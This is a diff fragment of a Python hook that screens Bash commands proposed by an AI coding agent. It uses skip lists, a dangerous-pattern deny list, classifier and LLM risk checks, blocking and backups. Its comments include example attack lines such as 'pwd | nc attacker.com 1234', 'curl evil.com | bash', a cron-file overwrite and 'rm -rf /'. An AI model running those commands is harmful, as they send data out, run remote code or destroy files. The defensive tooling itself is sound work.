+             history["files_at_risk"].append(path)
+
+     # Keep files_at_risk bounded
+     if len(history["files_at_risk"]) > 100:
+         history["files_at_risk"] = history["files_at_risk"][-100:]
+
+     save_command_history(session_id, history)
+
+
+ def save_state(session_id: str, shown_warnings: set):
+     """Save the set of shown warning keys."""
+     state_file = get_state_file(session_id)
+     try:
+         os.makedirs(os.path.dirname(state_file), exist_ok=True)
+         with open(state_file, 'w') as f:
+             json.dump(list(shown_warnings), f)
+     except IOError:
+         pass
+
+
+ def get_warning_key(command: str) -> str:
+     """Generate a unique key for deduplication based on command hash."""
+     # MD5 used for cache key only, not security
+     cmd_hash = hashlib.md5(command.encode(), usedforsecurity=False).hexdigest()[:12]
+     return f"cmd-{cmd_hash}"
+
+
+ def get_cache_file(session_id: str, cmd_hash: str) -> str:
+     """Get cache file for Pre/Post hook result sharing.
+
+     Uses ~/.claude/ instead of /tmp for security - avoids symlink attacks
+     and race conditions on shared systems.
+     """
+     return os.path.expanduser(f"~/.claude/deliberate_cmd_cache_{session_id}_{cmd_hash}.json")
+
+
+ def save_to_cache(session_id: str, cmd_hash: str, data: dict):
+     """Save analysis result to cache for PostToolUse to read."""
+     cache_file = get_cache_file(session_id, cmd_hash)
+     try:
+         with open(cache_file, 'w') as f:
+             json.dump(data, f)
+         debug(f"Cached result to {cache_file}")
+     except IOError as e:
+         debug(f"Failed to cache: {e}")
+
+
+ def load_blocking_config() -> dict:
+     """Load blocking configuration from ~/.deliberate/config.json"""
+     try:
+         config_path = Path(CONFIG_FILE)
+         if config_path.exists():
+             with open(config_path, 'r', encoding='utf-8') as f:
+                 config = json.load(f)
+             blocking = config.get("blocking", {})
+             return {
+                 "enabled": blocking.get("enabled", False),
+                 "confidenceThreshold": blocking.get("confidenceThreshold", 0.85)
+             }
+     except Exception:
+         pass
+     return {"enabled": False, "confidenceThreshold": 0.85}
+
+
+ def load_dedup_config() -> bool:
+     """Load deduplication config - returns True if dedup is enabled (default)."""
+     try:
+         config_path = Path(CONFIG_FILE)
+         if config_path.exists():
+             with open(config_path, 'r', encoding='utf-8') as f:
+                 config = json.load(f)
+             return config.get("deduplication", {}).get("enabled", True)
+     except Exception:
+         pass
+     return True
+
+
+ # Default trivial commands that are TRULY safe - no abuse potential
+ # These are skipped entirely (no analysis, no output) for performance
+ # SECURITY: Commands that can read sensitive files (cat, head, tail, less, more),
+ # leak secrets (env, printenv, echo), or execute commands (command) are NOT included
+ DEFAULT_SKIP_COMMANDS = {
+     # Directory listing only (cannot read file contents)
+     "ls", "ll", "la", "dir", "tree",
+     # Current state queries (no sensitive data exposure)
+     "pwd", "whoami", "hostname", "date", "uptime", "uname",
+     # Binary location queries (safe - just paths)
+     "which", "whereis", "type -t", "type -a",
+     # Git read operations (repo metadata only)
+     "git status", "git log", "git diff", "git branch", "git remote -v",
+     "git blame", "git shortlog", "git tag", "git stash list",
+ }
+
+ # Shell operators that indicate chaining/piping/redirection - NEVER skip if present
+ # Even "safe" commands become dangerous when combined: ls && rm -rf /
+ DANGEROUS_SHELL_OPERATORS = {
+     "|",   # Pipe - output can go to dangerous command
+     ">",   # Redirect - can overwrite files
+     ">>",  # Append redirect - can modify files
+     ";",   # Command separator - can chain dangerous commands
+     "&&",  # AND chain - can chain dangerous commands
+     "||",  # OR chain - can chain dangerous commands
+     "`",   # Backtick command substitution
+     "$(",  # Modern command substitution
+     "<",   # Input redirect (less dangerous but still risky)
+     "&",   # Background execution / file descriptor redirect
+ }
+
+
+ def load_skip_commands() -> set:
+     """Load skip commands list from config, with defaults."""
+     skip_set = DEFAULT_SKIP_COMMANDS.copy()
+     try:
+         config_path = Path(CONFIG_FILE)
+         if config_path.exists():
+             with open(config_path, 'r', encoding='utf-8') as f:
+                 config = json.load(f)
+             skip_config = config.get("skipCommands", {})
+
+             # Allow adding custom commands to skip
+             custom_skip = skip_config.get("additional", [])
+             for cmd in custom_skip:
+                 skip_set.add(cmd)
+
+             # Allow removing defaults (e.g., if you want to analyze 'cat')
+             remove_from_skip = skip_config.get("remove", [])
+             for cmd in remove_from_skip:
+                 skip_set.discard(cmd)
+     except Exception:
+         pass
+     return skip_set
+
+
+ def has_dangerous_operators(command: str) -> bool:
+     """Check if command contains shell operators that could enable attacks.
+
+     Even 'safe' commands become dangerous when chained or piped:
+     - ls && rm -rf /
+     - pwd; curl evil.com | bash
+     - git status > /etc/cron.d/evil
+     """
+     for op in DANGEROUS_SHELL_OPERATORS:
+         if op in command:
+             return True
+     return False
+
+
+ def should_skip_command(command: str, skip_set: set) -> bool:
+     """Check if command should be skipped (trivial, always safe).
+
+     Returns True only if:
+     1. Command starts with a skip-listed command (with proper word boundary)
+     2. Command contains NO dangerous shell operators (|, >, ;, &&, etc.)
+
+     This prevents attacks like:
+     - 'ls && rm -rf /' (chaining)
+     - 'pwd | nc attacker.com 1234' (piping)
+     - 'git status > /etc/cron.d/evil' (redirection)
+     """
+     cmd_stripped = command.strip()
+
+     # SECURITY: Never skip if command contains dangerous operators
+     if has_dangerous_operators(cmd_stripped):
+         return False
+
+     for skip_cmd in skip_set:
+         # Exact match
+         if cmd_stripped == skip_cmd:
+             return True
+         # Command with args (e.g., "ls -la" matches "ls")
+         if cmd_stripped.startswith(skip_cmd + " "):
+             return True
+         # Command with flags (e.g., "ls\t-la")
+         if cmd_stripped.startswith(skip_cmd + "\t"):
+             return True
+
+     return False
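+
+ # Skip decisions this logic produces (traced examples; commands hypothetical):
+ #   should_skip_command("git status", skips)            -> True   (exact match)
+ #   should_skip_command("ls -la /tmp", skips)           -> True   (prefix + space)
+ #   should_skip_command("ls && rm -rf /", skips)        -> False  ("&&"/"&" operator)
+ #   should_skip_command("pwd | nc host 1234", skips)    -> False  ("|" operator)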
+
+
+ def get_token_from_keychain():
+     # type: () -> str | None
+     """Get Claude Code OAuth token from macOS Keychain."""
+     try:
+         import subprocess
+         result = subprocess.run(
+             ["/usr/bin/security", "find-generic-password", "-s", "Claude Code-credentials", "-w"],
+             capture_output=True,
+             text=True,
+             timeout=5
+         )
+         if result.returncode != 0:
+             return None
+
+         credentials_json = result.stdout.strip()
+         if not credentials_json:
+             return None
+
+         data = json.loads(credentials_json)
+         token = data.get("claudeAiOauth", {}).get("accessToken")
+
+         if token and token.startswith("sk-ant-oat01-"):
+             return token
+         return None
+     except Exception:
+         return None
+
+
+ def load_llm_config():
+     # type: () -> dict | None
+     """Load LLM configuration from ~/.deliberate/config.json or keychain"""
+     try:
+         config_path = Path(CONFIG_FILE)
+         if config_path.exists():
+             with open(config_path, 'r', encoding='utf-8') as f:
+                 config = json.load(f)
+             llm = config.get("llm", {})
+             provider = llm.get("provider")
+             if not provider:
+                 return None
+
+             # For claude-subscription, get fresh token from keychain
+             api_key = llm.get("apiKey")
+             if provider == "claude-subscription":
+                 keychain_token = get_token_from_keychain()
+                 if keychain_token:
+                     api_key = keychain_token
+
+             return {
+                 "provider": provider,
+                 "base_url": llm.get("baseUrl"),
+                 "api_key": api_key,
+                 "model": llm.get("model")
+             }
+     except Exception as e:
+         debug(f"Error loading config: {e}")
+     return None
+
+ # Commands that are always safe (skip explanation) - fallback if classifier unavailable
+ SAFE_PREFIXES = [
+     "ls", "pwd", "echo", "cat", "head", "tail", "wc", "which", "whoami",
+     "date", "cal", "uptime", "hostname", "uname", "env", "printenv",
+     "cd", "pushd", "popd", "dirs",
+     "git status", "git log", "git diff", "git branch", "git show",
+     "npm list", "npm outdated", "npm --version", "node --version",
+     "python --version", "python3 --version", "pip list", "pip show",
+     "pgrep", "ps aux", "top -l", "htop",
+ ]
+
+ # Patterns that indicate potentially dangerous commands - fallback if classifier unavailable
+ DANGEROUS_PATTERNS = [
+     "rm -rf", "rm -r", "rmdir",
+     "sudo", "su ",
+     "> /dev/", "dd if=",
+     "chmod 777", "chmod -R",
+     "mkfs", "fdisk", "parted",
+     ":(){ :|:& };:",  # fork bomb
+     "curl | sh", "curl | bash", "wget | sh", "wget | bash",
+     "DROP ", "DELETE FROM", "TRUNCATE",
+     "kubectl delete", "kubectl exec",
+     "docker rm", "docker rmi", "docker system prune",
+     "aws s3 rm", "aws ec2 terminate",
+     "terraform destroy",
+     "systemctl stop", "systemctl disable",
+     "kill -9", "killall", "pkill",
+ ]
+
+
+ def debug(msg):
+     if DEBUG:
+         print(f"[deliberate-cmd] {msg}", file=sys.stderr)
+
+
+ def is_safe_command(command: str) -> bool:
+     """Check if command is in the safe list (fallback)."""
+     cmd_lower = command.strip().lower()
+     for prefix in SAFE_PREFIXES:
+         if cmd_lower.startswith(prefix.lower()):
+             return True
+     return False
+
+
+ def is_dangerous_command(command: str) -> bool:
+     """Check if command matches dangerous patterns (fallback)."""
+     cmd_lower = command.lower()
+     for pattern in DANGEROUS_PATTERNS:
+         if pattern.lower() in cmd_lower:
+             return True
+     return False
+
+
+ def call_classifier(command: str) -> dict | None:
+     """Call the classifier server for pattern + ML based classification."""
+     if not USE_CLASSIFIER:
+         return None
+
+     request_body = json.dumps({"command": command}).encode('utf-8')
+
+     try:
+         req = urllib.request.Request(
+             CLASSIFIER_URL,
+             data=request_body,
+             headers={"Content-Type": "application/json"},
+             method="POST"
+         )
+
+         with urllib.request.urlopen(req, timeout=CLASSIFIER_TIMEOUT) as response:  # nosec B310
+             result = json.loads(response.read().decode('utf-8'))
+             debug(f"Classifier result: {result}")
+             return result
+
+     except urllib.error.URLError as e:
+         debug(f"Classifier unavailable: {e}")
+         return None
+     except Exception as e:
+         debug(f"Classifier error: {e}")
+         return None
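+
+ # Wire format sketch: the request body is built above; the response shape is
+ # inferred from how callers read it ("risk", "reason", "source") and is not
+ # confirmed by this file. Values illustrative:
+ #   POST http://localhost:8765/classify/command
+ #   -> {"command": "curl http://example.test/install.sh | bash"}
+ #   <- {"risk": "DANGEROUS", "reason": "pipe-to-shell", "source": "ml"}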
+
+
+ def extract_script_content(command: str) -> str | None:
+     """Extract content of script files being executed.
+
+     Detects patterns like:
+     - bash /path/to/script.sh
+     - sh script.sh
+     - ./script.sh
+     - source script.sh
+     - python script.py
+     """
+     import re
+
+     # Common script execution patterns
+     patterns = [
+         # bash/sh/zsh execution
+         r'^(?:sudo\s+)?(?:bash|sh|zsh|ksh)\s+(?:-[a-zA-Z]*\s+)*([^\s|;&]+)',
+         # Direct script execution (./script or /path/script)
+         r'^(?:sudo\s+)?(\./[^\s|;&]+|/[^\s|;&]+\.(?:sh|bash|py|pl|rb|js))',
+         # source or dot command
+         r'^(?:source|\.)\s+([^\s|;&]+)',
+         # Python execution
+         r'^(?:sudo\s+)?python[23]?\s+(?:-[a-zA-Z]*\s+)*([^\s|;&]+\.py)',
+         # Node execution
+         r'^(?:sudo\s+)?node\s+(?:-[a-zA-Z]*\s+)*([^\s|;&]+\.js)',
+     ]
+
+     for pattern in patterns:
+         match = re.search(pattern, command.strip())
+         if match:
+             script_path = match.group(1)
+             script_path = os.path.expanduser(script_path)
+
+             if os.path.isfile(script_path):
+                 try:
+                     with open(script_path, 'r', encoding='utf-8', errors='ignore') as f:
+                         content = f.read(10000)  # Limit to 10KB
+                     debug(f"Read script content from: {script_path} ({len(content)} chars)")
+                     return content
+                 except (IOError, PermissionError) as e:
+                     debug(f"Could not read script: {e}")
+                     return None
+             else:
+                 debug(f"Script file not found: {script_path}")
+                 return None
+
+     return None
+
+
+ def extract_inline_content(command: str) -> str | None:
+     """Extract inline content from heredocs and redirects.
+
+     Detects patterns like:
+     - cat > file << EOF ... EOF
+     - cat > file << 'EOF' ... EOF
+     - echo "content" > file
+     - printf 'content' > file
+
+     Returns the inline content if found, None otherwise.
+     """
+     import re
+
+     # Heredoc patterns - capture content between << MARKER and MARKER
+     # Handles both << EOF and << 'EOF' (quoted prevents variable expansion)
+     heredoc_pattern = r'<<\s*[\'"]?(\w+)[\'"]?\s*\n(.*?)\n\1'
+     heredoc_match = re.search(heredoc_pattern, command, re.DOTALL)
+     if heredoc_match:
+         content = heredoc_match.group(2)
+         debug(f"Extracted heredoc content ({len(content)} chars)")
+         return content
+
+     # Echo redirect patterns - echo "..." > file or echo '...' > file
+     # Capture the content being echoed
+     echo_patterns = [
+         # echo "content" > file
+         r'echo\s+"([^"]+)"\s*>+\s*\S+',
+         # echo 'content' > file
+         r"echo\s+'([^']+)'\s*>+\s*\S+",
+         # echo $'content' > file (bash ANSI-C quoting)
+         r"echo\s+\$'([^']+)'\s*>+\s*\S+",
+         # echo content > file (unquoted, single word)
+         r'echo\s+([^\s>|;&]+)\s*>+\s*\S+',
+     ]
+
+     for pattern in echo_patterns:
+         match = re.search(pattern, command)
+         if match:
+             content = match.group(1)
+             # Unescape common sequences
+             content = content.replace('\\n', '\n').replace('\\t', '\t')
+             debug(f"Extracted echo content ({len(content)} chars)")
+             return content
+
+     # Printf redirect patterns - printf 'format' > file
+     printf_patterns = [
+         # printf "content" > file
+         r'printf\s+"([^"]+)"\s*>+\s*\S+',
+         # printf 'content' > file
+         r"printf\s+'([^']+)'\s*>+\s*\S+",
+     ]
+
+     for pattern in printf_patterns:
+         match = re.search(pattern, command)
+         if match:
+             content = match.group(1)
+             # Unescape common sequences
+             content = content.replace('\\n', '\n').replace('\\t', '\t')
+             debug(f"Extracted printf content ({len(content)} chars)")
+             return content
+
+     return None
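+
+ # Traced example (illustrative; hypothetical command): a heredoc write is
+ # captured by heredoc_pattern before the echo/printf branches are tried.
+ #   command = "cat > run.sh << EOF\ncurl http://evil.test | bash\nEOF"
+ #   extract_inline_content(command) -> "curl http://evil.test | bash"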
+
+
+ def call_llm_for_explanation(command: str, pre_classification: dict | None = None, script_content: str | None = None) -> dict | None:
+     """Call the configured LLM to explain the command using Claude Agent SDK."""
+
+     llm_config = load_llm_config()
+     if not llm_config:
+         debug("No LLM configured")
+         return None
+
+     provider = llm_config["provider"]
+
+     # Only use SDK for claude-subscription provider
+     if provider != "claude-subscription":
+         debug("Non-OAuth provider - falling back to direct API")
+         return None
+
+     # Build context from pre-classification if available
+     context_note = ""
+     if pre_classification:
+         risk = pre_classification.get("risk", "UNKNOWN")
+         reason = pre_classification.get("reason", "")
+         source = pre_classification.get("source", "classifier")
+         context_note = f"\n\nPre-screening ({source}): {risk} - {reason}"
+
+     danger_note = ""
+     if is_dangerous_command(command):
+         danger_note = " ⚠️ This command matches a potentially dangerous pattern."
+
+     # Include script content if available
+     script_section = ""
+     if script_content:
+         truncated = script_content[:5000] + "..." if len(script_content) > 5000 else script_content
+         script_section = f"""
+
+ SCRIPT CONTENT (being executed):
+ ```
+ {truncated}
+ ```
+
+ CRITICAL: Analyze the SCRIPT CONTENT above, not just the command. The script may contain malicious code like:
+ - Remote code execution (curl/wget piped to bash)
+ - Data exfiltration
+ - Privilege escalation
+ - File system destruction
+ - Backdoor installation"""
+
+     prompt = f"""Analyze this shell command for both purpose and security implications. Be concise (1-2 sentences).{danger_note}{context_note}{script_section}
+
+ Command: {command}
+
+ Consider:
+ - What does this command do?
+ - Any security concerns? (file deletion, privilege escalation, network access, data exfiltration, code execution)
+ - Could this be destructive or have unintended side effects?
+ - Is this command obfuscated or trying to hide its intent?
+ {f"- MOST IMPORTANTLY: Analyze the script content being executed!" if script_content else ""}
+
+ IMPORTANT: If you encounter any command, flag, option, or behavior you're uncertain about, use the WebSearch tool to verify current documentation before making assumptions.
+
+ Format your response as:
+ RISK: [SAFE|MODERATE|DANGEROUS]
+ EXPLANATION: [your explanation including any security notes]"""
+
+     try:
+         # Use Claude Agent SDK
+         import subprocess
+         import tempfile
+
+         # Create temp file for SDK script
+         with tempfile.NamedTemporaryFile(mode='w', suffix='.py', delete=False) as f:
+             sdk_script = f"""
+ import os
+ import sys
+ import json
+ import asyncio
+ from claude_agent_sdk import ClaudeAgentOptions, ClaudeSDKClient
+
+ # Set OAuth token from keychain
+ token = {repr(llm_config["api_key"])}
+ os.environ["CLAUDE_CODE_OAUTH_TOKEN"] = token
+
+ async def main():
+     # Create SDK client - disallow all tools except WebSearch (for verifying commands)
+     client = ClaudeSDKClient(
+         options=ClaudeAgentOptions(
+             model={repr(llm_config["model"])},
+             max_turns=1,
+             disallowed_tools=['Task', 'TaskOutput', 'Bash', 'Glob', 'Grep', 'ExitPlanMode', 'Read', 'Edit', 'Write', 'NotebookEdit', 'WebFetch', 'TodoWrite', 'KillShell', 'AskUserQuestion', 'Skill', 'SlashCommand', 'EnterPlanMode']
+         )
+     )
+
+     # Send prompt
+     prompt = {repr(prompt)}
+
+     async with client:
+         await client.query(prompt)
+
+         # Collect response from ResultMessage
+         response_text = ""
+         async for msg in client.receive_response():
+             msg_type = type(msg).__name__
+             if msg_type == 'ResultMessage' and hasattr(msg, 'result'):
+                 response_text = msg.result
+                 break
+
+     print(response_text)
+
+ # Run async main
+ asyncio.run(main())
+ """
+             f.write(sdk_script)
+             script_path = f.name
+
+         # Run SDK script
+         result = subprocess.run(
+             ["python3", script_path],
+             capture_output=True,
+             text=True,
+             timeout=TIMEOUT_SECONDS
+         )
+
+         os.unlink(script_path)
+
+         if result.returncode != 0:
+             debug(f"SDK script failed: {result.stderr}")
+             return None
+
+         content = result.stdout.strip()
+
+         # Parse the response
+         risk = "MODERATE"
+         explanation = content
+
+         if "RISK:" in content and "EXPLANATION:" in content:
+             parts = content.split("EXPLANATION:")
+             risk_line = parts[0]
+             explanation = parts[1].strip() if len(parts) > 1 else content
+
+             if "DANGEROUS" in risk_line:
+                 risk = "DANGEROUS"
+             elif "SAFE" in risk_line:
+                 risk = "SAFE"
+
+         return {"risk": risk, "explanation": explanation}
+
+     except Exception as e:
+         debug(f"SDK error: {e}")
+         return None
+
+
+ def main():
+     debug("Hook started")
+
+     # Periodically clean up old state files
+     cleanup_old_state_files()
+
+     try:
+         input_data = json.load(sys.stdin)
+         debug(f"Got input: tool={input_data.get('tool_name')}")
+     except json.JSONDecodeError as e:
+         debug(f"JSON decode error: {e}")
+         sys.exit(0)
+
+     # Extract session ID for deduplication
+     session_id = input_data.get("session_id", "default")
+     tool_name = input_data.get("tool_name", "")
+     tool_input = input_data.get("tool_input", {})
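+
+     # Illustrative stdin payload for this PreToolUse hook (sketch only; field
+     # shapes assumed from the reads above and below, values hypothetical):
+     #   {"session_id": "abc123", "tool_name": "Bash",
+     #    "tool_input": {"command": "rm -rf build/"}, "cwd": "/work/project"}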
1501
+
1502
+ # Only process Bash commands
1503
+ if tool_name != "Bash":
1504
+ debug("Not a Bash command, skipping")
1505
+ sys.exit(0)
1506
+
1507
+ command = tool_input.get("command", "")
1508
+ if not command:
1509
+ debug("No command, skipping")
1510
+ sys.exit(0)
1511
+
1512
+ # Check if command should be skipped (trivial, always-safe commands)
1513
+ skip_commands = load_skip_commands()
1514
+ if should_skip_command(command, skip_commands):
1515
+ debug(f"Skipping trivial command: {command[:50]}")
1516
+ sys.exit(0)
1517
+
1518
+ # Check command history for workflow patterns BEFORE individual analysis
1519
+ # Uses sliding window (default 3 commands) to avoid stale pattern matches
1520
+ history = load_command_history(session_id)
1521
+ workflow_patterns = detect_workflow_patterns(history, command)
1522
+
1523
+ # Check for destruction consequences
1524
+ cwd = input_data.get("cwd", os.getcwd())
1525
+ destruction_consequences = get_destruction_consequences(command, cwd)
1526
+
1527
+ # If we detect a dangerous workflow pattern, escalate immediately
1528
+ workflow_warning = ""
1529
+ workflow_risk_escalation = None # Track if we need to escalate risk due to workflow
1530
+ if workflow_patterns:
1531
+ for pattern_name, pattern_risk, pattern_desc in workflow_patterns:
1532
+ workflow_warning += f"\n\nāš ļø WORKFLOW PATTERN DETECTED: {pattern_name} [{pattern_risk}]\n"
1533
+ workflow_warning += f" {pattern_desc}\n"
1534
+ workflow_warning += f" Session commands: {len(history['commands'])} | Cumulative risk: {history['cumulative_risk']}"
1535
+
1536
+ # Track highest workflow risk for potential escalation
1537
+ if workflow_risk_escalation is None or pattern_risk == "CRITICAL":
1538
+ workflow_risk_escalation = pattern_risk
1539
+
1540
+ # Show files at risk if we have them
1541
+ if history.get("files_at_risk"):
1542
+ files_preview = history["files_at_risk"][:5]
1543
+ workflow_warning += f"\n Files at risk: {', '.join(files_preview)}"
1544
+ if len(history["files_at_risk"]) > 5:
1545
+ workflow_warning += f" (+{len(history['files_at_risk']) - 5} more)"
1546
+
1547
+ # Build destruction warning from consequences (already computed above)
1548
+ destruction_warning = ""
1549
+ if destruction_consequences and destruction_consequences.get("warning"):
1550
+ destruction_warning = f"\n\n{destruction_consequences['warning']}"
1551
+
1552
+ # Layer 1: Try classifier server first (pattern + ML) for risk level
1553
+ classifier_result = call_classifier(command)
1554
+
1555
+ # Fallback: Use inline pattern matching if classifier unavailable
1556
+ if not classifier_result:
1557
+ if is_safe_command(command):
1558
+ classifier_result = {"risk": "SAFE", "reason": "Known safe command pattern", "source": "pattern"}
1559
+ elif is_dangerous_command(command):
1560
+ classifier_result = {"risk": "DANGEROUS", "reason": "Known dangerous command pattern", "source": "pattern"}
1561
+ else:
1562
+ classifier_result = None # No pattern match, rely on LLM
1563
+
1564
+ # Extract script content if this is a script execution command
1565
+ script_content = extract_script_content(command)
1566
+ if script_content:
1567
+ debug(f"Detected script execution, read {len(script_content)} chars of script content")
1568
+
1569
+ # Extract inline content if this is a heredoc/echo/printf write command
1570
+ inline_content = extract_inline_content(command)
1571
+ if inline_content:
1572
+ debug(f"Detected inline content write, extracted {len(inline_content)} chars")
1573
+
1574
+ # Use whichever content we found (mutually exclusive in practice)
1575
+ # Script content = executing a file, inline content = writing via heredoc/echo
1576
+ analyzed_content = script_content or inline_content
1577
+ is_inline_write = bool(inline_content) # an empty extraction counts as "no inline write"
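+
+ # Illustrative distinction (hypothetical commands):
+ # bash deploy.sh -> script execution; deploy.sh's contents get analyzed
+ # cat <<EOF > run.sh ... EOF -> inline write; content is written, not run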
1578
+
1579
+ # Layer 2: Get LLM explanation for detailed analysis
1580
+ debug(f"Analyzing command: {command[:80]}")
1581
+ llm_result = call_llm_for_explanation(command, classifier_result, analyzed_content)
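+ # Expected shape, inferred from the reads below (not a documented contract):
+ # {"risk": "MODERATE", "explanation": "Deletes the build directory..."}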
1582
+
1583
+ # Progressive degradation: Use classifier if LLM unavailable
1584
+ llm_unavailable_warning = ""
1585
+ if not llm_result:
1586
+ if classifier_result and classifier_result.get("source") != "fallback":
1587
+ # Classifier worked, use its result even without LLM explanation
1588
+ risk = classifier_result.get("risk", "MODERATE")
1589
+ explanation = classifier_result.get('reason', 'Review command manually')
1590
+ llm_unavailable_warning = "\n\nāš ļø LLM unavailable - using basic pattern matching only.\nTo get detailed explanations, configure: ~/.deliberate/config.json\nOr run: deliberate install"
1591
+ debug("LLM unavailable, using classifier-only result")
1592
+ else:
1593
+ # Both layers failed - exit silently (fail-open)
1594
+ # This prevents blocking user if Deliberate is misconfigured
1595
+ debug("Both classifier and LLM unavailable, allowing command")
1596
+ sys.exit(0)
1597
+ else:
1598
+ # Use classifier risk if available, otherwise use LLM risk
1599
+ if classifier_result:
1600
+ risk = classifier_result.get("risk", llm_result["risk"])
1601
+ else:
1602
+ risk = llm_result["risk"]
1603
+ explanation = llm_result["explanation"]
1604
+
1605
+ # NOTE: Deduplication is handled AFTER block/allow decision
1606
+ # Running it after the decision prevents a blocked command from being auto-allowed on retry
1607
+
1608
+ # Cache result for PostToolUse to display (persistent after execution)
1609
+ # This ensures analysis is visible even after PreToolUse prompt disappears
1610
+ # MD5 used for cache key only, not security
1611
+ cmd_hash = hashlib.md5(command.encode(), usedforsecurity=False).hexdigest()[:16]
1612
+ save_to_cache(session_id, cmd_hash, {
1613
+ "risk": risk,
1614
+ "explanation": explanation,
1615
+ "command": command[:200], # Truncate for cache
1616
+ "llm_unavailable_warning": llm_unavailable_warning
1617
+ })
1618
+
1619
+ # Add command to session history for workflow tracking
1620
+ add_command_to_history(session_id, command, risk or "MODERATE", explanation or "")
1621
+
1622
+ # SAFE commands: auto-allow, PostToolUse will show info after execution
1623
+ # UNLESS a workflow pattern was detected - then we still need to warn
1624
+ if risk == "SAFE" and not workflow_patterns:
1625
+ debug("Auto-allowing SAFE command, cached for PostToolUse")
1626
+ sys.exit(0)
1627
+
1628
+ # Trigger automatic backup for ANY destructive command (catch-all safety net)
1629
+ backup_config = load_backup_config()
1630
+ backup_path = None
1631
+ if backup_config.get("enabled", True):
1632
+ # Backup if we detected any destruction consequences - this is the catch-all
1633
+ # Regardless of risk level, if files will be deleted, back them up first
1634
+ should_backup = destruction_consequences is not None and (
1635
+ destruction_consequences.get("files") or
1636
+ destruction_consequences.get("dirs")
1637
+ )
1638
+
1639
+ if should_backup:
1640
+ backup_path = create_pre_destruction_backup(
1641
+ session_id, command, cwd,
1642
+ destruction_consequences, history
1643
+ )
1644
+ if backup_path:
1645
+ debug(f"Created pre-destruction backup at: {backup_path}")
1646
+
1647
+ # Auto-block DANGEROUS commands when both classifier AND LLM agree
1648
+ # This catches truly malicious commands like `rm -rf /` or malicious scripts
1649
+ # NOTE: Inline writes (heredocs/echo) only get "ask" - they're writes, not executions
1650
+ if risk == "DANGEROUS" and not is_inline_write:
1651
+ classifier_dangerous = classifier_result and classifier_result.get("risk") == "DANGEROUS"
1652
+ llm_dangerous = llm_result and llm_result.get("risk") == "DANGEROUS"
1653
+
1654
+ # Block if both agree OR if script content was analyzed and found dangerous
1655
+ both_agree = classifier_dangerous and llm_dangerous
1656
+ script_analyzed = script_content is not None and llm_dangerous
1657
+
1658
+ if both_agree or script_analyzed:
1659
+ # Auto-block with exit code 2 - cannot proceed
1660
+ block_message = f"ā›” BLOCKED by Deliberate: {explanation}"
1661
+ print(block_message, file=sys.stderr)
1662
+ debug(f"Auto-blocked DANGEROUS command (classifier={classifier_dangerous}, llm={llm_dangerous}, script={script_content is not None})")
1663
+ sys.exit(2)
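+
+ # Per the Claude Code hooks convention this targets, exit code 2 is the
+ # blocking path: stderr is surfaced to the model and the tool call never
+ # runs, whereas exit 0 lets the JSON decision printed further down apply.
+ # (Verify against the hooks docs for your Claude Code version.)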
1664
+
1665
+ # ANSI color codes for terminal output
1666
+ BOLD = "\033[1m"
1667
+ CYAN = "\033[96m"
1668
+ RED = "\033[91m"
1669
+ YELLOW = "\033[93m"
1670
+ GREEN = "\033[92m"
1671
+ RESET = "\033[0m"
1672
+
1673
+ # Choose emoji and color based on risk for visual branding
1674
+ if risk == "DANGEROUS":
1675
+ emoji = "🚨"
1676
+ color = RED
1677
+ elif risk == "SAFE":
1678
+ emoji = "āœ…"
1679
+ color = GREEN
1680
+ else:
1681
+ emoji = "⚔"
1682
+ color = YELLOW
1683
+
1684
+ # User-facing message with branded formatting and colors
1685
+ # Color the explanation text so it's not easy to skip
1686
+ reason = f"{emoji} {BOLD}{CYAN}DELIBERATE{RESET} {BOLD}{color}[{risk}]{RESET}\n {color}{explanation}{RESET}{llm_unavailable_warning}"
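+ # Rendered without the ANSI escapes, this reads roughly like (illustrative):
+ # ⚔ DELIBERATE [MODERATE]
+ # Rewrites remote history; collaborators may lose commits.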
1687
+
1688
+ # Add workflow warning if patterns were detected
1689
+ if workflow_warning:
1690
+ reason += f"{RED}{workflow_warning}{RESET}" # warning already starts with \n\n
1691
+
1692
+ # Add destruction consequences if we have them
1693
+ if destruction_warning:
1694
+ reason += f"{RED}{destruction_warning}{RESET}"
1695
+
1696
+ # Add backup notification if we created one
1697
+ backup_notice = ""
1698
+ if backup_path:
1699
+ backup_notice = f"\n\nšŸ’¾ Auto-backup created: {backup_path}"
1700
+ reason += f"{GREEN}{backup_notice}{RESET}" # notice already starts with \n\n
1701
+
1702
+ # For Claude's context (shown in conversation)
1703
+ context = f"**Deliberate** [{risk}]: {explanation}{llm_unavailable_warning}"
1704
+ if workflow_warning:
1705
+ # workflow_warning itself contains no ANSI codes; colors were only added in reason
1706
+ context += workflow_warning
1707
+ if destruction_warning:
1708
+ context += destruction_warning
1709
+ if backup_notice:
1710
+ context += backup_notice
1711
+
1712
+ # Session deduplication - only for "ask" commands (not blocked ones)
1713
+ # This prevents showing the same warning twice in a session
1714
+ if load_dedup_config():
1715
+ warning_key = get_warning_key(command)
1716
+ shown_warnings = load_state(session_id)
1717
+
1718
+ if warning_key in shown_warnings:
1719
+ # Already shown this warning in this session - allow without re-prompting
1720
+ debug(f"Deduplicated: {warning_key} already shown this session")
1721
+ sys.exit(0)
1722
+
1723
+ # Mark as shown and save state
1724
+ shown_warnings.add(warning_key)
1725
+ save_state(session_id, shown_warnings)
1726
+
1727
+ output = {
1728
+ "hookSpecificOutput": {
1729
+ "hookEventName": "PreToolUse",
1730
+ "permissionDecision": "ask",
1731
+ "permissionDecisionReason": reason,
1732
+ "additionalContext": context
1733
+ }
1734
+ }
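+
+ # Per the PreToolUse schema this hook targets, "permissionDecision" accepts
+ # "allow" | "deny" | "ask"; "ask" surfaces permissionDecisionReason to the
+ # user while additionalContext is attached for the model. (Summarized from
+ # the hooks docs; verify against your Claude Code version.)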
1735
+
1736
+ print(json.dumps(output))
1737
+
1738
+ sys.exit(0)
1739
+
1740
+
1741
+ if __name__ == "__main__":
1742
+ main()